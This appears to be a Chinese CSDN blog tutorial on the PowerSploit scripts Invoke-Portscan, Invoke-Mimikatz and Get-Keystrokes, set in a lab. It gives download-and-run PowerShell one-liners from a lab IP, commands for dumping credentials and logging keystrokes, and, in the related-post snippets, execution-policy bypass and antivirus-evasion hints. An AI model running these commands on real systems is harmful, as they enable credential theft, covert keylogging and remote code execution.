Invoke-Portscan、Invoke-Mimikatz、Get-Keystrokes

最新推荐文章于 2023-10-14 16:29:09 发布
最新推荐文章于 2023-10-14 16:29:09 发布
阅读量594 收藏 1
点赞数
文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46104215/article/details/121212477
版权
本文介绍了PowerSploit中的三个关键脚本:Invoke-Portscan用于端口扫描,Invoke-Mimikatz用于获取系统凭据,而Get-Keystrokes则用于键盘记录。这些脚本在网络安全和渗透测试中具有重要作用。通过下载并执行这些脚本,可以模拟攻击行为,以检查系统安全性和防御能力。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、Invoke-Portscan

Recon 模块的一个脚本,主要用于端口扫描

1.下载脚本

IEX(New-Object Net.WebClient).DownloadString("http://192.168.110.130/PowerSploit/Recon/Invoke-Portscan.ps1")

2.扫描

Invoke-Portscan -Hosts 192.168.110.130, 192.168.110.142 -Ports "80,22,4444"

二、Invoke-Mimikatz

Exfiltration 模块的脚本,获取 Hash

1.下载

IEX(New-Object Net.WebClient).DownloadString("http://192.168.110.130/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1")

2.执行,需要管理员权限

Invoke-Mimikatz -DumpCreds

三、Get-Keystrokes

Exfiltration 模块的脚本,用于键盘记录,功能强大;不仅键盘输入记录,甚至能记录鼠标的点击情况,还能记录详细的时间,实战可以直接放入后台运行

1.下载

IEX(New-Object Net.WebClient).DownloadString("http://192.168.110.130/PowerSploit/Exfiltration/Get-Keystrokes.ps1")

2.开启键盘记录

Get-Keystrokes -LogPath c:\win-test\write.txt

3.随意输入,如 “i want to try”

 

 

橙汁水
关注
Invoke-Mimikatz.ps1脚本使用
墨痕诉清风的博客
05-31 641
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonPasswords full"' //获取密码。有时当获得权限时无法使用mimikatz.exe时,可以考虑使用Invoke-Mimikatz.ps1脚本获取想要的数据。Import-Module .\Invoke-Mimikatz.ps1 //导入命令。Set-ExecutionPolicy Unrestricted //打开限制。
实训周笔记
m0_67370064的博客
04-07 308
PowerShell简介 常用的PowerShell攻击工具: PowerSploit Nishang PowerCat PowerShell是一种基于任务的命令行解释器和脚本环境,可以说是一种强大的shell,如同linux的bash,专为系统管理员而设计,以.NET框架为平台,Windows PowerShell帮助IT专业人员和超级用户控制和自动化管理Windows操作系统和运行在操作系统上的应用。现被更广泛用于渗透测试等方面,在不需要写入磁盘的情况下执行命令,也可以逃避Anti-Viru..
Invoke-Mimikatz.txt
03-01
Invoke-Mimikatz
powersploit Invoke-Portscan模块
u013930899的博客
05-07 656
1. Invoke-Portscan模块 Invoke-Portscan是Recon模块下的一个脚本,主要用于端口扫描。 2. 在目标机上下载portscan脚本 PS C:\Users\Administrator> IEX (New-Object Net.WebClient).DownloadString("http://192.168.101.46/PowerSploit/Recon/Invoke-Portscan.ps1") 3. 运行脚本扫描 ...
网络安全-powershell:powersploit Get-Keystrokes
u013930899的博客
05-11 701
1. Get-Keystrokes Get-Keystrokes是Exfiltration模块下的一个脚本,用于键盘记录,功能相当强大,不仅有键盘输入记录,甚至能记录鼠标的点击情况,还能记录详细的时间,实战时可以直接放入后台运行。 2. 下载脚本 IEX (New-Object Net.WebClient).DownloadString("http://192.168.101.46/PowerSploit/Exfiltration/Get-Keystrokes.ps1") 3....
portscan
Khada_Jhin的博客
09-25 973
简易端口扫描器 python 语言 先记录上最初模型 201909 #-*- coding:utf-8 -*- import socket,sys print ''' Wellcome PORTSCAN! ''' def open(host,port): s = socket.socket() try: s.connect((host,port)) ...
Powershell攻击指南1——PowerSploit
willow_liang的博客
12-05 1699
1.1PowerShell技术 灵活且能功能化管理Windows系统,一旦攻击者可以在计算机上执行代码,就可下载powershell脚本(.ps1)到磁盘中执行,甚至可以直接在内存中执行。 常用的powershell攻击工具: PowerSploit: 这是众多owehShe攻击工具中被广泛使用的PoweShel后期漏洞利用框架,常用于信息探测、特权提升、凭证窃取、持久化等操作。 Nishang:基于PowerShell的渗透测试专用工具,集成了框架、脚本和各种Payload,包含下载和执行、键盘记
powershell渗透基础
qq_46804551的博客
04-30 1366
一旦攻击者可以在一台计算机上运行代码,就会下载powershell脚本文件(.ps1)到磁盘中 执行,甚至无需写到磁盘中执行,它可以直接在内存中运行,利用诸多特点攻击者可以持续攻击而不被轻易发现。 常用的powershell攻击工具有以下几种: powerSploit: 常用于信息探测,权限提升,凭证窃取,持久化等操作 Nishang: 基于powershell的渗透测试专用工具,集成了框架,脚本和各种payload,包含下载和执行,键盘记录,DNS,延时命令等脚本 Empire: 基于powe
内网渗透之收集信息
是江涛呀的博客
04-20 2588
信息收集 首先看拿到的是PC还是服务器 当前的机器角色:web服务器、公共服务器 、代理服务器、DNS服务器等 对机器所处的网路环境分析:绘制出内网的大致网络拓扑结构 对机器所在的区域进行分析:DMZ区域、办公区域、核心区域等 本机信息收集 查找内网的网段 1、用工具扫网段(s.exe-->基于tcp或syn) 2、文件共享链接记录(ftp链接、mstsc3389链接记录) 3.抓包分析网络流量(分析流量看网段)、meterpreter抓取流量 4、爆破路由器 网络配置信息 ipconfig
网络安全渗透
李子木的博客
04-04 8714
Sqlmap简介 sqlmap是一种开源的渗透测试工具,可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。它拥有非常强大的检测引擎、具有多种特性的渗透测试神器、通过数据库指纹提取访问底层文件系统并通过外带连接执行命令。 支持的数据库:MySQL,Oracle, PostgreSQL, SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MAXDB。 Sqlmap安装 (1)安装sqlmap前,需要.
powershell + Invoke-Mimikatz.ps1获取系统密码
大方子
10-29 6524
参照:https://blog.51cto.com/simeon/2126106 进行实现 Invoke-Mimikatz.ps1下载地址 https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1 (1)目标主机具备网络环境 power...
通过xencrypt免杀invoke-mimikatz.ps1
网络安全。
03-03 1667
0x01 简介 xencrypt目前测试只在windows 2012 powershell下可正常使用,需要依赖原本的invoke-mimikatz.ps1,生成以后可多次使用。 0x02 使用 1、下载invoke-mimikatz.ps1到同级目录下。 https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exf...
Invoke-Mimikatz.ps1获取系统密码
weixin_34357267的博客
06-07 1000
(1)Invoke-Mimikatz.ps1下载地址https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1(2)具备网络环境直接执行命令powershell "IEX (New-Object Net.WebClient).DownloadString('...
萌新如何玩转mimikatz
m0_71745484的博客
02-13 7445
mimikatz就是我遇见的一个坎
【后渗透】Mimikatz使用大全
hacker3062的博客
10-14 2012
Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe 进程中获取当前登录系统用户名的密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而 mimikatz 正是通过对lsass逆算获取到明文密码!
内网渗透中mimikatz的使用
热门推荐
pyphrb的博客
07-28 4万+
0x01 简介mimikatz,很多人称之为密码抓取神器,但在内网渗透中,远不止这么简单0x02 测试环境网络资源管理模式:域 已有资源:域内一台主机权限 操作系统:win7 x64 域权限:普通用户0x03 测试目标1、获得域控权限 2、导出所有用户口令 3、维持域控权限0x04 测试过程1、获取本机信息mimikatz:privilege::debug sekurlsa::logonpas
一句powershell调用mimikatz抓密码
weixin_30950237的博客
05-13 462
mimikatz神器大家都知道吧,可以抓取系统内的明文密码,但是平时我们测试的时候需要把mimikatz的几个文件上传到目标系统上面,然后再手工执行几个命令才能搞定,今天无意访问一个大神的博客,发现其实可以利用powershell一句话搞定,是国外大神的方法。 国外大神clymb3r写的一个powershell脚本将mimikatz注入到内存调用logonPasswords获取密码,使用起来相当...
Mimikatz.ps1本地执行
weixin_30575309的博客
03-20 198
PS C:\Users\hacker> Get-ExecutionPolicy Restricted PS C:\Users\hacker> Set-ExecutionPolicy Unrestricted PS C:\Users\hacker\Desktop> Import-Module .\Invoke-Mimikatz.ps1 PS C:\Users\hacker\...
PowerSploit的使用
浅笑996的博客
03-26 733
Invoke-Mimikatz(依赖管理员) Import-Module .\invoke-mimikatz.ps1 Invoke-Mimikatz –DumpCreds 使用Invoke-Mimikatz –command “mimikatz命令”来执行命令: Invoke-Mimikatz –command "token::elevate" Invoke-Ninjacopy (依赖管理...
PowerSploit的Invoke-portscan.ps1脚本,执行命令需要更新为Invoke-portscan -Hosts 192.168.100.140-Ports "21,22,80,443"
最新发布
03-14
<think>嗯,用户想知道怎么用PowerSploit里的Invoke-Portscan.ps1脚本进行端口扫描。首先,我需要回忆一下这个脚本的基本用法,可能还要参考提供的引用内容。引用[1]里提到了两条指令,一个是下载脚本,另一个是执行扫描,参数是-hosts和-ports。 用户需要具体的命令行参数示例,尤其是Hosts和Ports的更新。首先应该确认如何正确加载脚本,可能需要用IEX命令从远程下载。然后,参数部分,hosts可以是单个IP、多个逗号分隔的IP,或者CIDR格式,比如192.168.1.0/24。Ports参数可以是逗号分隔的端口列表,或者范围比如1-1024。 然后,用户可能想知道更详细的参数,比如扫描类型(-ScanType),比如TCP、UDP或者SYN扫描,但引用中没有提到,可能需要结合常识补充。另外,线程数(-Threads)可能影响扫描速度,但默认值是多少呢?可能默认是100,但不确定,可能需要建议用户测试调整。 还要注意PowerShell的执行策略问题,用户可能需要绕过限制,比如使用-exec bypass,如引用[5]中的命令。另外,执行脚本可能需要先导入模块,或者直接调用。 可能还需要提醒用户权限问题,SYN扫描需要管理员权限,这点在引用里没提到,但属于常见问题。最后,给出完整的示例命令,确保用户能够复制粘贴使用,并验证结果是否正确。 另外,用户的问题可能涉及到网络安全或渗透测试,需要强调合法使用,避免法律问题。但回答中可能不需要提到这点,除非用户特别询问。 总结回答的结构:加载脚本的方法,参数详解(hosts、ports、scantype、threads),完整示例,注意事项,相关引用。然后生成相关问题,比如如何绕过执行策略,其他扫描类型,或者处理防火墙干扰。</think>### PowerSploit Invoke-Portscan.ps1 使用方法详解 #### 1. **加载脚本** 首先需通过PowerShell下载并加载脚本(需管理员权限): ```powershell iex (New-Object Net.WebClient).DownloadString("http://<Your_Server_IP>/PowerSploit/Recon/Invoke-Portscan.ps1") ``` (将`<Your_Server_IP>`替换为存放脚本的服务器地址)[^1] #### 2. **核心参数说明** - **`-Hosts`** 支持格式:单个IP、逗号分隔的多个IP或CIDR网段。 示例: ```powershell -Hosts "192.168.1.7" -Hosts "192.168.1.7,192.168.1.10" -Hosts "192.168.1.0/24" ``` - **`-Ports`** 支持格式:逗号分隔的端口列表或范围。 示例: ```powershell -Ports "80,22,3389" -Ports "1-1024" # 扫描1到1024端口 ``` - **`-ScanType`** 可选扫描类型:`TCP`(默认)、`UDP`、`SYN`(需管理员权限)。 示例: ```powershell -ScanType "SYN" ``` - **`-Threads`** 控制并发线程数(默认100),影响扫描速度。 示例: ```powershell -Threads 200 ``` #### 3. **完整示例命令** ```powershell Invoke-Portscan -Hosts "192.168.1.7,192.168.1.10" -Ports "80,22,445,1-1000" -ScanType "TCP" -Threads 150 ``` #### 4. **注意事项** - **权限要求**:`SYN`扫描需管理员权限,`UDP`扫描可能被防火墙拦截[^4]。 - **绕过执行策略**:若遇权限问题,可添加参数: ```powershell powershell.exe -exec bypass -W hidden -nop [命令] ``` 参考示例[^5]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值